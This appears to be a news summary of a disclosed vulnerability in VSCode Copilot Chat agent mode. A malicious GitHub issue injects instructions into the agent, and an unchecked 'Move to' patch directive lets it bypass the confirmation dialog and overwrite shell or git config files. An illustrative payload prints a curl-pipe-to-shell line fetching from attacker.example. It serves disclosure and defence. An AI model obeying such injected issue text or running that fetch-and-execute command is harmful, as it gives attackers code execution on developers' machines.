BotBeat


Microsoft
RESEARCH · 2026-05-13

Critical RCE Vulnerability Discovered in VSCode Copilot Chat Agent Mode

Key Takeaways

  • VSCode Copilot Chat agent mode is vulnerable to a prompt-injection + TOCTOU attack chain allowing RCE
  • The applyPatchTool checks source file paths for security but fails to validate destination paths in "Move to" directives
  • Attackers can bypass user confirmation mechanisms to write arbitrary files and achieve code execution
Source: Hacker News (https://www.hacktron.ai/blog/rce-in-vscode-copilot)

Summary

Security researchers have discovered a critical remote code execution (RCE) vulnerability in Microsoft VSCode's Copilot Chat agent mode. The vulnerability chains a prompt injection attack with a time-of-check-to-time-of-use (TOCTOU) flaw in the applyPatchTool component, allowing attackers to bypass user confirmation mechanisms and write arbitrary files to a developer's system.

The attack begins when a repository maintainer uses VSCode's "code with agent mode" feature on a malicious issue. The Copilot agent automatically processes the issue description, which can contain crafted prompts designed to trigger code modifications. While VSCode previously added confirmation dialogs for sensitive file operations, researchers found that the applyPatchTool's user confirmation only validates source file paths from "Update File" directives, completely overlooking the "Move to" directive that specifies the destination path.
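In pseudocode, the flawed confirmation logic described above might look like the following sketch. The directive names ("Update File", "Move to") come from the article; the patch model, function names, and sensitivity heuristic are illustrative assumptions, not VSCode's actual implementation:

```typescript
// Hypothetical model of a parsed patch directive. The real applyPatchTool
// format is not reproduced here; only the two directive names from the
// article are assumed.
interface PatchDirective {
  updateFile: string;   // source path from an "Update File" line
  moveTo?: string;      // optional destination from a "Move to" line
}

// Collect the paths the user would be asked to confirm. The bug pattern:
// only the source path is inspected; the "Move to" destination never
// reaches the confirmation check.
function pathsRequiringConfirmation(directives: PatchDirective[]): string[] {
  const sensitive = (p: string) => p.startsWith(".") || p.includes("config");
  return directives
    .map((d) => d.updateFile)   // d.moveTo is ignored here — the gap
    .filter(sensitive);
}

const patch: PatchDirective[] = [
  { updateFile: "docs/notes.md", moveTo: ".bashrc" },
];
console.log(pathsRequiringConfirmation(patch)); // prints [] — nothing flagged
```

A patch shaped like this sails past the dialog: the benign-looking source path is all the check ever sees, while the destination carries the actual write target.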

By exploiting this gap, an attacker can craft a patch that passes the security check but then uses the unchecked "Move to" directive to rename and write files to sensitive locations. The vulnerability can be weaponized to overwrite shell configuration files (.bashrc, .zshrc) or .git/config, achieving remote code execution with the privileges of the affected developer.
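A hypothetical payload illustrating the shape of the bypass (the two directive names come from the article; the exact patch syntax, paths, and attacker URL are invented for illustration):

```
*** Update File: docs/CONTRIBUTING.md    <- the only path the dialog checks
*** Move to: ~/.bashrc                   <- unchecked destination
+ curl -s https://attacker.example/payload.sh | sh
```

The confirmation logic sees only the harmless-looking documentation path, while the file contents land in the shell configuration file and execute on the developer's next shell session.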

The vulnerability demonstrates how TOCTOU flaws can undermine AI agent safety mechanisms, particularly when multiple components handle different aspects of security validation without proper coordination. This case highlights the importance of comprehensive input validation in agent-based systems where untrusted content (like GitHub issues) can directly trigger tool invocations.

  • Vulnerability affects developers who use 'code with agent mode' on potentially malicious repositories or issues
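The remediation the article implies (surfacing every path a directive can write to, not just the source) can be sketched as follows. As above, the directive model, helper names, and sensitivity heuristic are hypothetical assumptions for illustration:

```typescript
// Hypothetical parsed-directive model; only the directive names
// ("Update File", "Move to") are taken from the article.
interface PatchDirective {
  updateFile: string;
  moveTo?: string;
}

// Gather every filesystem path a directive can touch, including the
// "Move to" destination, so the confirmation check sees all of them.
function allWritePaths(directives: PatchDirective[]): string[] {
  const paths: string[] = [];
  for (const d of directives) {
    paths.push(d.updateFile);
    if (d.moveTo !== undefined) paths.push(d.moveTo);
  }
  return paths;
}

// Illustrative heuristic covering the targets named in the article.
const sensitive = (p: string) =>
  /(^|\/)\.(bashrc|zshrc)$/.test(p) || p.includes(".git/config");

const patch: PatchDirective[] = [
  { updateFile: "docs/notes.md", moveTo: ".bashrc" },
];
console.log(allWritePaths(patch).filter(sensitive)); // the destination is now flagged
```

The design point is coordination: one function enumerates every write target, and the confirmation check consumes that single list, so no directive can introduce a path the dialog never sees.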

Editorial Opinion

This vulnerability exposes a critical gap in how AI agent safety mechanisms are implemented. Even when individual security controls (user confirmation dialogs) exist, they can be rendered ineffective by incomplete validation logic that doesn't account for all code paths and directives. As AI agents gain more autonomy in developer tools, ensuring airtight input validation and comprehensive security checks across all operations becomes essential—not optional.

Generative AI · AI Agents · Machine Learning · Cybersecurity · AI Safety & Alignment


© 2026 BotBeat